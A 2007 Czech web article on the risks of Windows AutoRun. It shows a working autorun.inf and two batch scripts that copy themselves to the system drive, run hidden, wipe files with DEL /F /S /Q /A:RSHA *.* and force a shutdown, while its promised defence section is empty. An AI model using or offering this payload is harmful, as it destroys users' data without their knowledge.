Utility a zabezpečení Windows - 11. díl
 x   TIP: Přetáhni ikonu na hlavní panel pro připnutí webu
Reklama
Reklama

Utility a zabezpečení Windows - 11. dílUtility a zabezpečení Windows - 11. díl

 

Utility a zabezpečení Windows - 11. díl

Google       Google       11. 8. 2007       15 647×

Chcete se dozvědět, jaké nebezpečí vám hrozí kvůli zapnutému AutoRunu? Čtěte dál.

Reklama
Reklama

AutoRun zajišťuje automatické načtení média při vložení do PC, znáte to například z různých CD/DVD, co se přidávájí k herním časopisům, po vložení CD Vám automaticky naběhne většinou menu. Říkáte si, že je to v pořádku, ale teď si vemte, že to někdo přenastaví tak, aby se místo zobrazení nějakého menu vykonal nějaký příkaz, třeba DEL /F /S /Q /A:RSHA *.*, to by jistě nebylo moc příjemné.

Nejdříve bych vysvětlil, jak to vlastně funguje. Představte si, že na CD máte tyto 3 soubory: „autorun.inf“, „script.cmd“ a „script2.cmd“. Při vložení CD se zpracuje soubor „autorun.inf“. „Autorun.inf“ může obsahovat třeba:

[AutoRun]
open=script.cmd

To znamená, že otevře (spustí) soubor script.cmd; ve script.cmd může být prakticky cokoliv, třeba toto:

@ECHO OFF
COPY "script2.cmd" "%systemdrive%\script2.cmd" /Y
START "%systemdrive%\script2.cmd" /B

@ECHO OFF skrývá příkazy, copy kopíruje soubor script2.cmd do %systemdrive% (nejčastěji C:). START spouští script2.cmd už z pevného disku (je to „ochrana“, kdyby uživatel vyndal CD), „/B“ je přepínač, který zajistí, aby se spustila aplikace bez vytvoření nového okna, v našem případě script2.cmd.

A konečně jdeme na obsah souboru script2.cmd, ten v sobě může obsahovat naprosto cokoliv. Třeba:

@ECHO OFF
DEL /F /S /Q /A:RSHA *.*
SHUTDOWN -s -f -t 5 -c "n00b!"

DEL smaže skoro celý disk a díky přepínačům do toho nemůžete nijak moc zasahovat, shutdown vypne počítač za 5 sekund, zobrazí komentář „n00b!“. Toto je důvod, proč tento článek píšu. Můžete takto lehce přijít o svá data, ale mezi námi, s tímto způsobem ztráty dat se potýkáme velice málo…

Obrana

Jsem obeznámen se dvěma metodami prevence:

Toť vše, případné dotazy do komentářů.

Příští téma – msgina.dll a fakegina.dll.

×Odeslání článku na tvůj Kindle

Zadej svůj Kindle e-mail a my ti pošleme článek na tvůj Kindle.
Musíš mít povolený příjem obsahu do svého Kindle z naší e-mailové adresy kindle@programujte.com.

E-mailová adresa (např. novak@kindle.com):

TIP: Pokud chceš dostávat naše články každé ráno do svého Kindle, koukni do sekce Články do Kindle.

Hlasování bylo ukončeno    
0 hlasů
Google
(fotka) ShaiMagalAutor se zajímá o všechny kouty IT a chtěl by se uplatnit v oblasti výpočetní techniky.
Web    

Nové články

Obrázek ke článku Delphi 10.1.2 (Berlin Update 2) – na co se můžeme těšit

Delphi 10.1.2 (Berlin Update 2) – na co se můžeme těšit

Touto roční dobou, kdy je zem pokrytá barevným listím a prsty křehnou v mrazivých ránech, se obvykle těšíme na zbrusu novou verzi RAD Studia. Letos si však ale budeme muset počkat na Godzillu a Linux až do jara. Vezměme tedy za vděk alespoň updatem 2 a jelikož dle vyjádření pánů z Embarcadero se budou nové věci objevovat průběžně, pojďme se na to tedy podívat.

Reklama
Reklama
Obrázek ke článku Konference: Moderní datová centra pro byznys dneška se koná už 24. 11.

Konference: Moderní datová centra pro byznys dneška se koná už 24. 11.

Stále rostoucí zájem o cloudové služby i maximální důraz na pružnost, spolehlivost a bezpečnost IT vedou k výrazným inovacím v datových centrech. V infrastruktuře datových center hraje stále významnější roli software a stále častěji se lze setkat s hybridními přístupy k jejich budování i provozu.

Obrázek ke článku Konference: Mobilní technologie mají velký potenciál pro byznys

Konference: Mobilní technologie mají velký potenciál pro byznys

Firmy by se podle analytiků společnosti Gartner měly  rychle přizpůsobit skutečnosti, že mobilní technologie už zdaleka nejsou horkou novinkou, ale standardní součástí byznysu. I přesto - nebo možná právě proto - tu nabízejí velký potenciál. Kde tedy jsou ty největší příležitosti? I tomu se bude věnovat již čtvrtý ročník úspěšné konference Mobilní řešení pro business.

Obrázek ke článku Hackerský kongres přiveze v září do Prahy špičky světové kryptoanarchie

Hackerský kongres přiveze v září do Prahy špičky světové kryptoanarchie

Hackerský kongres HCPP16 pořádá od 30. září do 2. října nezisková organizace Paralelní Polis již potřetí, a to ve stejnojmenném bitcoinovém prostoru v pražských Holešovicích. Letos přiveze na třídenní konferenci přes 40 většinou zahraničních speakerů – lídrů z oblastí technologií, decentralizované ekonomiky, politických umění a aktivismu. Náměty jejich přednášek budou také hacking, kryptoměny, věda, svoboda nebo kryptoanarchie.

loadingtransparent (function() { var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = 'https://apis.google.com/js/plusone.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); })();
Hostujeme u Českého hostingu       ISSN 1801-1586       ⇡ Nahoru Webtea.cz logo © 20032016 Programujte.com
Zasadilo a pěstuje Webtea.cz, šéfredaktor Lukáš Churý